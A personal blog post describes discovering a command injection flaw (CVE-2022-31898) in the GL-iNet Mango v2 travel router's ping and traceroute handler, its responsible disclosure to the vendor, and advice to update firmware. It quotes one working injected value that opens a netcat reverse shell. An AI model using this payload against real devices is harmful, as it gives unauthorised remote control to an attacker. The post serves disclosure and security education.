The GL-iNet Mango Travel Router & CVE-2022-31898

I had an hour or two to kill before a dentist appointment last summer, so I pulled out the GL-iNet Mango v2 Travel Router I had bought to hack on in just this type of situation. At 30$ and about the size of a credit card, I figured I was bound to find something.

Ping and traceroute functionality exposed through the router’s web portal

And boy, did it not take long. After opening up the firmware in Ghidra and searching for calls to system() as a first shot, I stumbled across ping and traceroute functionality exposed to the web browser that appeared to be taking input directly from a POST parameter and executing the ping or traceroute command with the IP address/domain name entered into the web form as an argument. While the web form’s URL was not linked to by anything in the administration portal, the /ping endpoint could be directly navigated to.

The web form itself had some basic JavaScript sanitization which prevented the easiest of all possible exploits. But, putting the request into Burp, the handler happily accepted ; nc <ip> <port> -e /bin/ash as an IP address argument to ping or traceroute, creating a reverse shell back to my machine.

I reported the vulnerability immediately to GL-iNet, who were gracious and professional. Sadly, I was preëmpted by another guy by several weeks, so they already had a patch ready (we were still within the first guy’s disclosure window.) But, they were kind enough to throw a credit my way as well when they announced the vulnerability on their blog.

So, on that note — if you own a GL-iNet travel router (this vulnerability affects a number of their products, not just the Mango v2) — be sure to update to at least version 3.215.

Leave a Reply

Your email address will not be published. Required fields are marked *